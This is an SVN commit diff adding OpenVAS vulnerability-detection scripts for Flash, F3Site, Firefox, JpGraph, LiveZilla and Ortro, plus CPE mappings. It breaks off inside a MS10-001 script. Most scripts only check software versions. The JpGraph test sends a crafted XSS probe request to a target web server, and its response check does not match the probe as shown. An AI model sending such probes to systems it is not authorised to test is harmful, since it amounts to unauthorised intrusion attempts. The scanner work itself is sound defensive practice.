@@ CVE-2009-4494 Greenbone svn R CVE-2009-4495 Greenbone svn R CVE-2009-4496 Greenbone svn R +CVE-2009-4435 SecPod svn R +CVE-2010-0220 SecPod svn L +CVE-2009-4422 SecPod svn R +CVE-2009-4519 SecPod svn R +CVE-2009-4450 SecPod svn R + + Modified: trunk/openvas-plugins/scripts/cpe.inc =================================================================== --- trunk/openvas-plugins/scripts/cpe.inc 2010-01-13 13:13:49 UTC (rev 6398) +++ trunk/openvas-plugins/scripts/cpe.inc 2010-01-13 14:42:20 UTC (rev 6399) @@ -332,7 +332,11 @@ "K-Meleon/Ver", "^([0-9.]+)", "cpe:/a:christophe_thibault:k-meleon:", "KDE/Konqueror/Ver", "^([0-9.]+)", "cpe:/a:kde:konqueror:", "KTorrent/Linux/Ver", "^([0-9.]+([a-z0-9]+)?)", "cpe:/a:ktorrent:ktorrent:", -"Kaspersky/AV-Workstation/Ver", "^(6\.0)", "cpe:/a:kaspersky_lab:kaspersky_anti-virus:6.0::workstations ", +"Kaspersky/AV-Workstation/Ver", "^(6\.0)", "cpe:/a:kaspersky_lab:kaspersky_anti-virus:6.0::workstations", +"Kaspersky/AV-FileServer/Ver", "^(6\.0)", "cpe:/a:kaspersky_lab:kaspersky_anti-virus:6.0.3.837::windows_file_servers:", +"Kaspersky/IntNetSec/Ver", "^(7\..*)", "cpe:/a:kaspersky_lab:kaspersky_internet_security:", +"Kaspersky/IntNetSec/Ver", "^(8\..*)", " cpe:/a:kaspersky_lab:kaspersky_internet_security_2009:", +"Kaspersky/IntNetSec/Ver", "^(9\..*)", "cpe:/a:kaspersky_lab:kaspersky_internet_security_2010:", "Kaspersky/AV/Ver", "^(9\..*)", "cpe:/a:kaspersky:kaspersky_anti-virus:2010", "Kaspersky/AV/Ver", "^(8\..*)", "cpe:/a:kaspersky:kaspersky_anti-virus:2009", "Kaspersky/AV/Ver", "^(7\..*)", "cpe:/a:kaspersky:kaspersky_anti-virus:2008", @@ -701,6 +705,7 @@ "Alleycode-HTML-Editor/Ver", "^([0-9.]+)", "cpe:/a:konae:alleycode_html_editor:", "GD-Graphics-Lib/Lin/Ver", "^([0-9.]+\.[0-9])\.?([a-z0-9]+)?", "cpe:/a:libgd:gd_graphics_library:", "httpdx/*/Ver", "^([0-9.]+([a-z]+)?)", "cpe:/a:jasper:httpdx:", +"NaviCOPA/*/Ver", "^([0-9.]+)", "cpe:/a:intervations:navicopa_web_server:", "www/*/OpenDocMan", "^([0-9.]+)", "cpe:/a:opendocman:opendocman:", "CA/AV/Win/Ver", "^([0-9.]+)", "cpe:/a:ca:anti-virus:", "CA/ISS/Win/Ver", "^([0-9.]+)", "cpe:/a:ca:internet_security_suite", @@ -772,7 +777,9 @@ "www/*/Valarsoft/Webmatic", "^([0-9.]+)", "cpe:/a:valarsoft:webmatic:", "www/*/SQL-Ledger", "^([0-9.]+)","cpe:/a:sql-ledger:sql-ledger:", "www/*/PHP-Calendar", "^([0-9.]+)", "cpe:/a:php-calendar:php-calendar:", -"NaviCOPA/*/Ver", "^([0-9.]+)", "cpe:/a:intervations:navicopa_web_server:" +"www/*/JpGraph", "^([0-9.]+)", "cpe:/a:aditus:jpgraph:", +"www/*/Ortro", "^([0-9.]+([a-z0-9]+)?)", "cpe:/a:ortro:ortro:", +"www/*/LiveZilla", "^([0-9.]+)", "cpe:/a:livezilla:livezilla:" ); Added: trunk/openvas-plugins/scripts/gb_adobe_flash_player_remote_code_exec_vuln_winxp.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_adobe_flash_player_remote_code_exec_vuln_winxp.nasl 2010-01-13 13:13:49 UTC (rev 6398) +++ trunk/openvas-plugins/scripts/gb_adobe_flash_player_remote_code_exec_vuln_winxp.nasl 2010-01-13 14:42:20 UTC (rev 6399) @@ -0,0 +1,84 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_adobe_flash_player_remote_code_exec_vuln_winxp.nasl 2010-01-13 15:06:02Z oct $ +# +# Adobe Flash Player Remote Code Execution Vulnerability (WinXP) +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(800420); + script_version("$Revision$: 1.0"); + script_name("Adobe Flash Player Remote Code Execution Vulnerability (WinXP)"); + desc = " + Overview: This host has Adobe Flash Player installed and is prone to Remote + Code Execution vulnerability + + Vulnerability Insight: + The flaw exist when a user views a specially crafted Web page through Internet + Explorer. + + Impact: + Successful exploitation could allow remote attackers to crash an affected + system or execute arbitrary code by tricking a user into visiting a specially + crafted web page. + + Impact Level: System. + + Affected Software/OS: + Adobe Flash Player 6.x on Windows XP. + + Fix: Upgrade to Adobe Flash Player 10.0.42.34, + http://www.adobe.com/downloads/ + + References: + http://www.microsoft.com/technet/security/advisory/979267.mspx + + CVSS Score: + CVSS Base Score : 9.3 (AV:N/AC:M/Au:NR/C:C/I:C/A:C) + CVSS Temporal Score : 6.9 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version of Adobe Flash Player"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_family("Windows"); + script_dependencies("gb_adobe_flash_player_detect_win.nasl"); + exit(0); +} + + + +include("smb_nt.inc"); +include("secpod_reg.inc"); + +if(hotfix_check_sp(xp:4) <= 0){ + exit(0); +} + +adobeVer = get_kb_item("AdobeFlashPlayer/Win/Ver"); + +# Grep for versions 6 Series +if((adobeVer) && (adobeVer =~ "^6\.")){ + security_hole(0); +} Property changes on: trunk/openvas-plugins/scripts/gb_adobe_flash_player_remote_code_exec_vuln_winxp.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_f3site_mult_lfi_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_f3site_mult_lfi_vuln.nasl 2010-01-13 13:13:49 UTC (rev 6398) +++ trunk/openvas-plugins/scripts/gb_f3site_mult_lfi_vuln.nasl 2010-01-13 14:42:20 UTC (rev 6399) @@ -0,0 +1,100 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_f3site_mult_lfi_vuln.nasl 6443 2010-01-13 15:11:27Z jan $ +# +# F3Site 'GLOBALS[nlang]' Parameter Multiple Local File Include Vulnerabilities +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(800415); + script_version("$Revision$: 1.0"); + script_cve_id("CVE-2009-4435"); + script_bugtraq_id(37408); + script_name("F3Site 'GLOBALS[nlang]' Parameter Multiple Local File Include Vulnerabilities"); + desc = " + Overview: The host is running F3Site and is prone to multiple local file include + Vulnerabilities. + + Vulnerability Insight: + The flaw is caused due to error in 'mod/poll.php' and 'mod/new.php' which + are not properly sanitising user supplied input data via 'GLOBALS[nlang]' + parameter. + + Impact: + Successful exploitation could allow remote attackers to obtain sensitive + information or execute arbitrary code on the vulnerable Web Server. + + Impact Level: Application. + + Affected Software/OS: + F3Site 2009 and prior. + + Fix: + No solution or patch is available as on 13th january, 2010 Information + regarding this issue will be updated once the solution details are available. + For updates refer, http://dhost.info/compmaster/index.php + + References: + http://xforce.iss.net/xforce/xfdb/54908 + http://www.exploit-db.com/exploits/10536 + + CVSS Score: + CVSS Base Score : 7.5 (AV:N/AC:L/Au:NR/C:P/I:P/A:P) + CVSS Temporal Score : 6.7 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version of F3Site"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_dependencies("find_service.nes"); + script_family("Web application abuses"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +f3sPort = get_http_port(default:80); +if(!f3sPort){ + exit(0); +} + +foreach path (make_list("/", "/F3Site/SYSTEM", "/F3Site", cgi_dirs())) +{ + sndReq = http_get(item:string(path, "/index.php"), port:f3sPort); + rcvRes = http_send_recv(port:f3sPort, data:sndReq); + if("F3Site" >< rcvRes) + { + f3sVer = eregmatch(pattern:"F3Site ([0-9.]+)",string:rcvRes); + if(f3sVer[1] != NULL) + { + if(version_is_less_equal(version:f3sVer[1], test_version:"2009")){ + security_hole(f3sPort); + } + } + } +} + Property changes on: trunk/openvas-plugins/scripts/gb_f3site_mult_lfi_vuln.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_firefox_dos_vuln_win_jan10.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_firefox_dos_vuln_win_jan10.nasl 2010-01-13 13:13:49 UTC (rev 6398) +++ trunk/openvas-plugins/scripts/gb_firefox_dos_vuln_win_jan10.nasl 2010-01-13 14:42:20 UTC (rev 6399) @@ -0,0 +1,85 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_firefox_dos_vuln_win_jan10.nasl 6642 2010-01-12 16:05:33Z jan $ +# +# Firefox 'nsObserverList::FillObserverArray' DOS Vulnerability (Win) +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(800416); + script_version("$Revision$: 1.0"); + script_cve_id("CVE-2010-0220"); + script_name("Firefox 'nsObserverList::FillObserverArray' DOS Vulnerability (Win)"); + desc = " + Overview: The host is installed with Mozilla Firefox browser and is prone to + Denial of Service vulnerability. + + Vulnerability Insight: + The flaw is caused due to error in 'nsObserverList::FillObserverArray()' function + in 'xpcom/ds/nsObserverList.cpp' + + Impact: + Successful remote exploitation will let the attacker to crash application + via a crafted web site that triggers memory consumption and an accompanying + Low Memory alert dialog, and also triggers attempted removal of an observer + from an empty observers array. + + Impact Level: Application. + + Affected Software/OS: + Mozilla Firefox version prior to 3.5.7 on Windows. + + Fix: Upgrade to Firefox version 3.5.7 + http://www.mozilla.com/en-US/firefox/all.html + + References: + http://isc.sans.org/diary.html?storyid=7897 + https://bugzilla.mozilla.org/show_bug.cgi?id=507114 + http://www.mozilla.com/en-US/firefox/3.5.7/releasenotes + + CVSS Score: + CVSS Base Score : 5.0 (AV:N/AC:L/Au:NR/C:N/I:N/A:P) + CVSS Temporal Score : 3.7 + Risk factor : Medium"; + + script_description(desc); + script_summary("Check for the version of Mozilla Firefox"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_family("Denial of Service"); + script_dependencies("gb_firefox_detect_win.nasl"); + script_require_keys("Firefox/Win/Ver"); + exit(0); +} + + +include("version_func.inc"); + +firefoxVer = get_kb_item("Firefox/Win/Ver"); +if(!firefoxVer){ + exit(0); +} + +if(version_is_less(version:firefoxVer, test_version:"3.5.7")){ + security_warning(0); +} Property changes on: trunk/openvas-plugins/scripts/gb_firefox_dos_vuln_win_jan10.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_jpgraph_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_jpgraph_detect.nasl 2010-01-13 13:13:49 UTC (rev 6398) +++ trunk/openvas-plugins/scripts/gb_jpgraph_detect.nasl 2010-01-13 14:42:20 UTC (rev 6399) @@ -0,0 +1,75 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_jpgraph_detect.nasl 6417 2010-01-12 16:25:36Z jan $ +# +# JpGraph Version Detection +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +#This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(800413); + script_version("$Revision$:1.0"); + script_name("JpGraph Version Detection"); + desc = " + Overview: This script finds the running JpGraph version and saves + the result in KB. + + Risk factor: Informational"; + + script_description(desc); + script_summary("Set the version of JpGraph in KB"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_family("Service detection"); + script_dependencies("find_service.nes"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("http_keepalive.inc"); + +jgphPort = get_http_port(default:80); +if(!jgphPort){ + exit(0); +} + +foreach path (make_list("/", "/jpgraph", "/jpgraph/docportal", cgi_dirs())) +{ + sndReq = http_get(item:string(path, "/index.html"), port:jgphPort); + rcvRes = http_send_recv(port:jgphPort, data:sndReq); + if("JpGraph" >< rcvRes) + { + sndReq = http_get(item:string(path, "/../VERSION"), port:jgphPort); + rcvRes = http_keepalive_send_recv(port:jgphPort, data:sndReq, bodyonly:1); + if(!isnull(rcvRes)) + { + jgphVer = eregmatch(pattern:"v([0-9.]+)",string:rcvRes); + if(jgphVer[1] != NULL) + { + set_kb_item(name:"www/" + jgphPort + "/JpGraph", + value:jgphVer[1] + " under " + path); + } + } + } +} Property changes on: trunk/openvas-plugins/scripts/gb_jpgraph_detect.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_jpgraph_mult_xss_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_jpgraph_mult_xss_vuln.nasl 2010-01-13 13:13:49 UTC (rev 6398) +++ trunk/openvas-plugins/scripts/gb_jpgraph_mult_xss_vuln.nasl 2010-01-13 14:42:20 UTC (rev 6399) @@ -0,0 +1,111 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_jpgraph_mult_xss_vuln.nasl 6417 2010-01-12 15:11:27Z jan $ +# +# JpGraph Multiple Cross-Site Scripting Vulnerabilities +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(800414); + script_version("$Revision$: 1.0"); + script_cve_id("CVE-2009-4422"); + script_bugtraq_id(37483); + script_name("JpGraph Multiple Cross-Site Scripting Vulnerabilities"); + desc = " + Overview: The host is running JpGraph and is prone to multiple Cross-Site + Scripting vulnerabilities. + + Vulnerability Insight: + The flaw is caused due to the 'GetURLArguments()' function in 'jpgraph.php' not + properly sanitising HTTP POST and GET parameter keys. + + Impact: + Successful exploitation could allow remote attackers to execute arbitrary + HTML and script code in a user's browser session in the context of an + affected site and it result in XSS attack. + + Impact Level: Application. + + Affected Software/OS: + JpGraph version 3.0.6 and prior on all running platform. + + Fix: Apply patches from below link, + http://www.securityfocus.com/archive/1/archive/1/508586/100/0/threaded + + ***** + NOTE : Ignore this warning, if above mentioned patch is already applied. + ***** + + References: + http://osvdb.org/61268 + http://secunia.com/advisories/37832 + + CVSS Score: + CVSS Base Score : 4.3 (AV:N/AC:M/Au:NR/C:N/I:P/A:N) + CVSS Temporal Score : 3.5 + Risk factor : Medium"; + + script_description(desc); + script_summary("Check for the version of JpGraph"); + script_category(ACT_MIXED_ATTACK); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_dependencies("gb_jpgraph_detect.nasl"); + script_family("Web application abuses"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +jgphPort = get_http_port(default:80); +if(!jgphPort){ + exit(0); +} + +jgphVer = get_kb_item("www/" + jgphPort + "/JpGraph"); +if(!jgphVer){ + exit(0); +} + +jgphVer = eregmatch(pattern:"^(.+) under (/.*)$", string:jgphVer); +if(!safe_checks() && jgphVer[2] != NULL) +{ + request = http_get(item:jgphVer[2] + "/../src/Examples/csim_in_html_ex1.php?'" + + "/>=arbitrary", + port:jgphPort); + response = http_send_recv(port:jgphPort, data:request); + if("\'OpenVAS-XSS\'" >< response) + { + security_warning(jgphPort); + exit(0); + } +} + +if(jgphVer[1] != NULL) +{ + if(version_is_less_equal(version:jgphVer[1], test_version:"3.0.6")){ + security_warning(jgphPort); + } +} Property changes on: trunk/openvas-plugins/scripts/gb_jpgraph_mult_xss_vuln.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_livezilla_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_livezilla_detect.nasl 2010-01-13 13:13:49 UTC (rev 6398) +++ trunk/openvas-plugins/scripts/gb_livezilla_detect.nasl 2010-01-13 14:42:20 UTC (rev 6399) @@ -0,0 +1,70 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_livezilla_detect.nasl 6463 2010-01-11 16:25:36Z jan $ +# +# LiveZilla Version Detection +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(800417); + script_version("$Revision$: 1.0"); + script_name("LiveZilla Version Detection"); + desc = " + Overview: This script finds the running LiveZilla version and saves + the result in KB. + + Risk factor: Informational"; + + script_description(desc); + script_summary("Set the version of LiveZilla in KB"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_family("Service detection"); + script_dependencies("find_service.nes"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); + +lzillaPort = get_http_port(default:80); +if(!lzillaPort){ + exit(0); +} + +foreach path (make_list("/", "/LiveZilla", "livezilla", cgi_dirs())) +{ + sndReq = http_get(item:string(path, "/index.php"), port:lzillaPort); + rcvRes = http_send_recv(port:lzillaPort, data:sndReq); + + if("LiveZilla GmbH" >< rcvRes) + { + lzillaVer = eregmatch(pattern:">[Vv]ersion ([0-9.]+)", string:rcvRes); + if(lzillaVer[1] != NULL) + { + set_kb_item(name:"www/" + lzillaPort + "/LiveZilla", + value:lzillaVer[1] + " under " + path); + } + } +} Property changes on: trunk/openvas-plugins/scripts/gb_livezilla_detect.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_livezilla_mult_xss_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_livezilla_mult_xss_vuln.nasl 2010-01-13 13:13:49 UTC (rev 6398) +++ trunk/openvas-plugins/scripts/gb_livezilla_mult_xss_vuln.nasl 2010-01-13 14:42:20 UTC (rev 6399) @@ -0,0 +1,96 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_livezilla_mult_xss_vuln.nasl 6463 2010-01-11 15:11:27Z jan $ +# +# LiveZilla Multiple Cross-Site Scripting Vulnerabilities +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(800418); + script_version("$Revision$: 1.0"); + script_cve_id("CVE-2009-4450"); + script_name("LiveZilla Multiple Cross-Site Scripting Vulnerabilities"); + desc = " + Overview: The host is running LiveZilla and is prone to Cross-Site Scripting + Vulnerabilities. + + Vulnerability Insight: + Input passed to the 'lat', 'lng', and 'zom' parameters in 'map.php' is not + properly sanitised before being returned to the user. + + Impact: + Successful exploitation could allow remote attackers to execute arbitrary HTML + and script code in a user's browser session in the context of an affected site. + + Impact Level: Application. + + Affected Software/OS: + LiveZilla Version 3.1.8.3 and prior on all running platform. + + Fix: Apply patch from the below link, + http://www.securityfocus.com/archive/1/archive/1/508613/100/0/threaded + + ***** + NOTE : Ignore this warning, if above mentioned patch is applied already. + ***** + + References: + http://osvdb.org/61348 + http://secunia.com/advisories/37990 + + CVSS Score: + CVSS Base Score : 4.3 (AV:N/AC:M/Au:NR/C:N/I:P/A:N) + CVSS Temporal Score : 3.5 + Risk factor : Medium"; + + script_description(desc); + script_summary("Check for the version of LiveZilla"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_dependencies("gb_livezilla_detect.nasl"); + script_family("Web application abuses"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +lzillaPort = get_http_port(default:80); +if(!lzillaPort){ + exit(0); +} + +lzillaVer = get_kb_item("www/" + lzillaPort + "/LiveZilla"); +if(!lzillaVer){ + exit(0); +} + +lzillaVer = eregmatch(pattern:"^(.+) under (/.*)$", string:lzillaVer); +if(lzillaVer[1] != NULL) +{ + if(version_is_less_equal(version:lzillaVer[1], test_version:"3.1.8.3")){ + security_warning(lzillaPort); + } +} Property changes on: trunk/openvas-plugins/scripts/gb_livezilla_mult_xss_vuln.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_ortro_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_ortro_detect.nasl 2010-01-13 13:13:49 UTC (rev 6398) +++ trunk/openvas-plugins/scripts/gb_ortro_detect.nasl 2010-01-13 14:42:20 UTC (rev 6399) @@ -0,0 +1,72 @@ +################################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_ortro_detect.nasl 6536 2010-01-12 14:20:22Z jan $ +# +# Ortro Version Detection +# +# Authors: +# Rachana Shetty +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +################################################################################ + +if(description) +{ + script_id(800980); + script_version("$Revision$: 1.0"); + script_name("Ortro Version Detection"); + desc = " + Overview: This script detects the installed Ortro version and sets + the result in KB. + + Risk factor:Informational"; + + script_description(desc); + script_summary("Set KB for the version of Ortro"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_family("Service detection"); + script_dependencies("http_version.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("http_keepalive.inc"); + +ortroPort = get_http_port(default:80); +if(!ortroPort){ + exit(0); +} + +foreach dir (make_list("/", "/ortro", "/ortro/www", cgi_dirs())) +{ + sndReq = http_get(item:string(dir, "/index.php"), port:ortroPort); + rcvRes = http_keepalive_send_recv(port:ortroPort, data:sndReq, bodyonly:1); + if("Ortro" >< rcvRes) + { + ortroVer = eregmatch(pattern:"v(([0-9.]+).([a-zA-Z0-9]+)?)", string:rcvRes); + if(ortroVer[1] != NULL) + { + ortroVer[1] = ereg_replace(pattern:"-| ", replace:".", string:ortroVer[1]); + set_kb_item(name:"www/"+ ortroPort + "/Ortro", value:ortroVer[1] + + " under " + dir); + } + } +} + Property changes on: trunk/openvas-plugins/scripts/gb_ortro_detect.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_ortro_mult_vuln_jan10.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_ortro_mult_vuln_jan10.nasl 2010-01-13 13:13:49 UTC (rev 6398) +++ trunk/openvas-plugins/scripts/gb_ortro_mult_vuln_jan10.nasl 2010-01-13 14:42:20 UTC (rev 6399) @@ -0,0 +1,94 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_ortro_mult_vuln_jan10.nasl 6536 2010-01-12 15:22:08Z jan $ +# +# Ortro Multiple Unspecified Vulnerabilities +# +# Authors: +# Rachana Shetty +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(800981); + script_version("$Revision$: 1.0"); + script_cve_id("CVE-2009-4519"); + script_name("Ortro Multiple Unspecified Vulnerabilities"); + desc = " + Overview: The host has Ortro installed and is prone to multiple Unspecified + vulnerabilities. + + Vulnerability Insight: + The flaw is caused by unspecified errors with unknown impact and attack + vectors. + + Impact: + Successful exploitation will let the remote attacker Disable/Lock a host and + to perform scp transfer between two remote hosts. + + Impact Level: Application + + Affected Software/OS: + Ortro version prior to 1.3.4 + + Fix: Upgrade to Ortro version 1.3.4 + For Updates Refer, http://www.ortro.net/download + + References: + http://www.ortro.net/ + http://xforce.iss.net/xforce/xfdb/54026 + http://www.vupen.com/english/advisories/2009/3057 + + CVSS Score: + CVSS Base Score : 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) + CVSS Temporal Score : 7.4 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version of Ortro"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2010 Intevation GmbH"); + script_family("Web application abuses"); + script_dependencies("gb_ortro_detect.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +ortroPort = get_http_port(default:80); +if(!ortroPort){ + exit(0); +} + +ortroVer = get_kb_item("www/"+ ortroPort + "/Ortro"); +if(!ortroVer){ + exit(0); +} + +ortroVer = eregmatch(pattern:"^(.+) under (/.*)$", string:ortroVer); +if(ortroVer[1] != NULL) +{ + # Check for Ortro version prior to 1.3.4 + if(version_is_less(version:ortroVer[1], test_version:"1.3.4")){ + security_hole(ortroPort); + } +} Property changes on: trunk/openvas-plugins/scripts/gb_ortro_mult_vuln_jan10.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/secpod_ms10-001.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_ms10-001.nasl 2010-01-13 13:13:49 UTC (rev 6398) +++ trunk/openvas-plugins/scripts/secpod_ms10-001.nasl 2010-01-13 14:42:20 UTC (rev 6399) @@ -0,0 +1,150 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: secpod_ms10-001.nasl 6716 2010-01-13 09:14:35Z jan $ +# +# Microsoft Embedded OpenType Font Engine Remote Code Execution Vulnerabilities (972270) +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2010 SecPod, http://www.secpod.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be 